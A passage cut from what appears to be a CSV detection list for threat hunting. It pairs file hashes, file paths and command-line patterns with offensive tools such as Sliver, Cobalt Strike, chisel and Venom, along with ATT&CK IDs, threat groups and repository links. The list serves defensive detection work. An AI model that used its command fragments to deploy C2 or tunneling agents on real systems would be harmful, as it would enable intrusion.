master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33661" "*afd6ae4a43475e4583b50a168a89eb3f3ff3916fa2a9933c41581bc695a10796*",".{0,1000}afd6ae4a43475e4583b50a168a89eb3f3ff3916fa2a9933c41581bc695a10796.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33662" "*afd6b1709549377d5dc7d34f2ed69722f563a0c265dad53d5a7a185ac1b7fd72*",".{0,1000}afd6b1709549377d5dc7d34f2ed69722f563a0c265dad53d5a7a185ac1b7fd72.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33663" "*afd8bd5606cb0e36a8be84a629f7fda4b4ada793ddf9eb758d9259e529f9a76d*",".{0,1000}afd8bd5606cb0e36a8be84a629f7fda4b4ada793ddf9eb758d9259e529f9a76d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33664" "*afda444341d9478be17dbb1e4fcee7b7944920e26b83a18978be10d8ecfedf76*",".{0,1000}afda444341d9478be17dbb1e4fcee7b7944920e26b83a18978be10d8ecfedf76.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","33665" "*afe0e8f105e3f0e7eed041cf68a15594aa33a946d27c63adb18b8200ca98e5e8*",".{0,1000}afe0e8f105e3f0e7eed041cf68a15594aa33a946d27c63adb18b8200ca98e5e8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an 
open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33666" "*afe36c9c3160a5a6ce2a5df3cc7f61099bcfd71f2e9733a2dcf95410f5e63925*",".{0,1000}afe36c9c3160a5a6ce2a5df3cc7f61099bcfd71f2e9733a2dcf95410f5e63925.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33667" "*afeb282bb991650ada2e73c65ed5a1770e1a3bc415b2e1e07462b854c077c93d*",".{0,1000}afeb282bb991650ada2e73c65ed5a1770e1a3bc415b2e1e07462b854c077c93d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33669" 
"*afebad2b0d57634ed88fbadfa746b2ca9022622b77e33d49a300b62e9821e543*",".{0,1000}afebad2b0d57634ed88fbadfa746b2ca9022622b77e33d49a300b62e9821e543.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33670" "*afed646dee07893f5be9103606c2eeda2545e75b59b03e0a1e2fc42940e09d43*",".{0,1000}afed646dee07893f5be9103606c2eeda2545e75b59b03e0a1e2fc42940e09d43.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","33671" "*afefe0380e25f02064d72df3e13645de51d59879b31b5d741e4458fdf9ebaa81*",".{0,1000}afefe0380e25f02064d72df3e13645de51d59879b31b5d741e4458fdf9ebaa81.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33673" "*affa24f6e1fd339093365bfce238b94ec6948d4d1c401fc7dffc4921e9da0187*",".{0,1000}affa24f6e1fd339093365bfce238b94ec6948d4d1c401fc7dffc4921e9da0187.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","33675" "*ag_load_script*",".{0,1000}ag_load_script.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","33676" "*AG8AbwB0AGUAcgBBAHMAcwBlAG0AYgBsAHkAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIA*",".{0,1000}AG8AbwB0AGUAcgBBAHMAcwBlAG0AYgBsAHkAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIA.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","33677" "*agent*DNSCommunication.cpp*",".{0,1000}agent.{0,1000}DNSCommunication\.cpp.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","33678" "*agent.exe -dns -srvhost *",".{0,1000}agent\.exe\s\-dns\s\-srvhost\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","33679" "*agent.exe -lhost * -reuse-port *",".{0,1000}agent\.exe\s\-lhost\s.{0,1000}\s\-reuse\-port\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","33680" 
"*agent/blackvision.cpp*",".{0,1000}agent\/blackvision\.cpp.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","33682" "*agent/cmd_download_files.*",".{0,1000}agent\/cmd_download_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33683" "*agent/cmd_exec.*",".{0,1000}agent\/cmd_exec\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33684" "*agent/cmd_kill.*",".{0,1000}agent\/cmd_kill\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33685" "*agent/cmd_proxy.*",".{0,1000}agent\/cmd_proxy\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33686" "*agent/cmd_run.c*",".{0,1000}agent\/cmd_run\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33687" "*agent/cmd_shell.*",".{0,1000}agent\/cmd_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33688" "*agent/cmd_sleep.*",".{0,1000}agent\/cmd_sleep\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33689" "*agent/cmd_sysinfo.c*",".{0,1000}agent\/cmd_sysinfo\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33690" 
"*agent/cmd_upload_files.*",".{0,1000}agent\/cmd_upload_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33691" "*agent/dll.nim*",".{0,1000}agent\/dll\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","33692" "*agent/elf.nim*",".{0,1000}agent\/elf\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","33693" "*agent/exe.nim*",".{0,1000}agent\/exe\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","33694" 
"*Agent/ratchatPT.go*",".{0,1000}Agent\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","33695" "*agent\cmd_download_files.*",".{0,1000}agent\\cmd_download_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33696" "*agent\cmd_exec.*",".{0,1000}agent\\cmd_exec\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33697" "*agent\cmd_kill.*",".{0,1000}agent\\cmd_kill\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33698" "*agent\cmd_proxy.*",".{0,1000}agent\\cmd_proxy\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33699" "*agent\cmd_run.c*",".{0,1000}agent\\cmd_run\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33700" "*agent\cmd_shell.*",".{0,1000}agent\\cmd_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33701" "*agent\cmd_sleep.*",".{0,1000}agent\\cmd_sleep\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33702" "*agent\cmd_sysinfo.c*",".{0,1000}agent\\cmd_sysinfo\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33703" 
"*agent\cmd_upload_files.*",".{0,1000}agent\\cmd_upload_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33704" "*agent_code/bash_executor*",".{0,1000}agent_code\/bash_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","#linux","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","33705" "*agent_dll.dll*",".{0,1000}agent_dll\.dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33706" "*agent_linux_x64 -lport *",".{0,1000}agent_linux_x64\s\-lport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#linux","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","33707" "*agent_linux_x64 -rhost * -rport *",".{0,1000}agent_linux_x64\s\-rhost\s.{0,1000}\s\-rport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/Dliv3/Venom","1","0","#linux","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","33708" "*agents/Follina-2*",".{0,1000}agents\/Follina\-2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","33715" "*AggressiveProxy.cna*",".{0,1000}AggressiveProxy\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard 
Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","33717" "*aggressor.beacons*",".{0,1000}aggressor\.beacons.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33718" 
"*aggressor.bshell*",".{0,1000}aggressor\.bshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR 